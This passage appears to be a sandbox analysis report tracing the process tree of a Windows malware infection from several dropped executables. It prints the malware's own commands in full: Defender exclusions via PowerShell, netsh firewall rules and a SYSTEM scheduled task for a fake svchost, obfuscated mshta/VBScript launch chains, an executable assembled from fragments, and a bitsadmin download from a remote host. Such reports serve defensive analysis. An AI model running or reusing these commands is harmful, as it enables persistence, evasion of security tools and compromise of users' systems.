C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
PID:5236
-
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"3⤵
- Executes dropped EXE
PID:5272
-
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"3⤵
- Executes dropped EXE
PID:5372
-
-
-
C:\Users\Admin\Pictures\Adobe Films\N0NCDPohiNjHdlr2B2UqrBcW.exe"C:\Users\Admin\Pictures\Adobe Films\N0NCDPohiNjHdlr2B2UqrBcW.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5040
-
-
C:\Users\Admin\Pictures\Adobe Films\27nNpMIlNTg7B__qK3RO47JE.exe"C:\Users\Admin\Pictures\Adobe Films\27nNpMIlNTg7B__qK3RO47JE.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4384
-
-
C:\Users\Admin\Pictures\Adobe Films\DKAkDeyF1LExOxO6TrKZ5_B7.exe"C:\Users\Admin\Pictures\Adobe Films\DKAkDeyF1LExOxO6TrKZ5_B7.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5100
-
-
C:\Users\Admin\Pictures\Adobe Films\E8b5UKJ6STYQ0e00s7p6lTHo.exe"C:\Users\Admin\Pictures\Adobe Films\E8b5UKJ6STYQ0e00s7p6lTHo.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:448 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2180
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:3216
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:5304
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
PID:1212
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:1764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵PID:4076
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:496
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:4620
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ztFLqZo8tsSQFc1wqHeNc22m.exe"C:\Users\Admin\Pictures\Adobe Films\ztFLqZo8tsSQFc1wqHeNc22m.exe"2⤵
- Executes dropped EXE
PID:2444 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 2603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2308
-
-
-
C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe"C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1548 -
C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe"C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3844
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe"C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe"2⤵
- Executes dropped EXE
PID:4800 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵PID:3136
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe" ) do taskkill -im "%~NxK" -F4⤵PID:5720
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
- Executes dropped EXE
PID:5336 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵PID:3728
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵PID:836
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )6⤵PID:1408
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵PID:3656
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵PID:2196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵PID:5048
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵
- Loads dropped DLL
PID:5580
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "LLM8p_bDrZ_4l1sMHXmCXrq8.exe" -F5⤵
- Kills process with taskkill
PID:3500
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe"C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2608 -
C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe"C:\Users\Admin\Pictures\Adobe Films\wqbiRgzzrWfkfpbw9ubodg0k.exe"3⤵
- Executes dropped EXE
PID:3360
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gQG7ehujuMNa34AUJoZTHfYH.exe"C:\Users\Admin\Pictures\Adobe Films\gQG7ehujuMNa34AUJoZTHfYH.exe"2⤵
- Executes dropped EXE
PID:3352 -
C:\Users\Admin\AppData\Local\Temp\is-3V3A5.tmp\gQG7ehujuMNa34AUJoZTHfYH.tmp"C:\Users\Admin\AppData\Local\Temp\is-3V3A5.tmp\gQG7ehujuMNa34AUJoZTHfYH.tmp" /SL5="$4017C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\gQG7ehujuMNa34AUJoZTHfYH.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:816 -
C:\Users\Admin\AppData\Local\Temp\is-T530Q.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-T530Q.tmp\DYbALA.exe" /S /UID=27104⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
PID:4424 -
C:\Program Files\Reference Assemblies\NLVRILOBGT\foldershare.exe"C:\Program Files\Reference Assemblies\NLVRILOBGT\foldershare.exe" /VERYSILENT5⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3700
-
-
C:\Users\Admin\AppData\Local\Temp\4f-bc8a3-34a-bc7b2-bf763876be37d\Qulaepurola.exe"C:\Users\Admin\AppData\Local\Temp\4f-bc8a3-34a-bc7b2-bf763876be37d\Qulaepurola.exe"5⤵PID:4936
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e66⤵PID:1656
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵PID:1956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,16617225312044534049,6042884649164839992,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:37⤵PID:1624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,16617225312044534049,6042884649164839992,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:27⤵PID:4028
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad6⤵PID:1908
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵PID:5192
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514836⤵PID:4868
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵PID:5804
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515136⤵PID:4176
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵PID:5084
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872156⤵PID:6432
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵PID:6676
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631196⤵PID:1712
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵PID:2552
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942316⤵PID:6724
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547187⤵PID:5060
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ab-537c1-cef-14eb9-66d5c54198dc6\Tiqygaeberi.exe"C:\Users\Admin\AppData\Local\Temp\ab-537c1-cef-14eb9-66d5c54198dc6\Tiqygaeberi.exe"5⤵PID:396
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0s3mtotr.bbu\GcleanerEU.exe /eufive & exit6⤵PID:4512
-
C:\Users\Admin\AppData\Local\Temp\0s3mtotr.bbu\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\0s3mtotr.bbu\GcleanerEU.exe /eufive7⤵PID:5096
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 2568⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1732
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bolq5rd2.acr\installer.exe /qn CAMPAIGN="654" & exit6⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\bolq5rd2.acr\installer.exeC:\Users\Admin\AppData\Local\Temp\bolq5rd2.acr\installer.exe /qn CAMPAIGN="654"7⤵PID:4728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\htsztrok.1r2\any.exe & exit6⤵PID:4820
-
C:\Users\Admin\AppData\Local\Temp\htsztrok.1r2\any.exeC:\Users\Admin\AppData\Local\Temp\htsztrok.1r2\any.exe7⤵PID:6024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1losbnuw.fhl\gcleaner.exe /mixfive & exit6⤵PID:4052
-
C:\Users\Admin\AppData\Local\Temp\1losbnuw.fhl\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\1losbnuw.fhl\gcleaner.exe /mixfive7⤵PID:6420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6420 -s 2568⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6808
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zygfemy3.b21\autosubplayer.exe /S & exit6⤵PID:6792
-
C:\Users\Admin\AppData\Local\Temp\zygfemy3.b21\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\zygfemy3.b21\autosubplayer.exe /S7⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:6140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵PID:6224
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵PID:7132
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵PID:2284
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵PID:3328
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵PID:6888
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵PID:4552
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"8⤵
- Checks for any installed AV software in registry
PID:3888
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z8⤵
- Download via BitsAdmin
PID:4424 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:5996
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\n4B2euMVLh0bciK4wmLM5Ln_.exe"C:\Users\Admin\Pictures\Adobe Films\n4B2euMVLh0bciK4wmLM5Ln_.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4804 -
C:\Users\Admin\AppData\Roaming\4151360.exe"C:\Users\Admin\AppData\Roaming\4151360.exe"3⤵
- Executes dropped EXE
PID:2600
-
-
C:\Users\Admin\AppData\Roaming\6948140.exe"C:\Users\Admin\AppData\Roaming\6948140.exe"3⤵
- Executes dropped EXE
PID:6136
-
-
C:\Users\Admin\AppData\Roaming\7968681.exe"C:\Users\Admin\AppData\Roaming\7968681.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5156
-
-
C:\Users\Admin\AppData\Roaming\2794099.exe"C:\Users\Admin\AppData\Roaming\2794099.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6120
-
-
C:\Users\Admin\AppData\Roaming\294455.exe"C:\Users\Admin\AppData\Roaming\294455.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:984 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:4804
-
-
-
C:\Users\Admin\AppData\Roaming\8882655.exe"C:\Users\Admin\AppData\Roaming\8882655.exe"3⤵
- Executes dropped EXE
PID:3296
-
-
-
C:\Users\Admin\Pictures\Adobe Films\kxf1nN_BO3OQXSHBdwGCWokI.exe"C:\Users\Admin\Pictures\Adobe Films\kxf1nN_BO3OQXSHBdwGCWokI.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5024 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:6076 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"4⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:7152 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7fffd258dec0,0x7fffd258ded0,0x7fffd258dee05⤵
- Loads dropped DLL
PID:1100 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff60b0a9e70,0x7ff60b0a9e80,0x7ff60b0a9e906⤵
- Loads dropped DLL
PID:6316
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=1752 /prefetch:85⤵
- Loads dropped DLL
- Modifies system certificate store
PID:5148
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1616 /prefetch:25⤵PID:1164
-
-
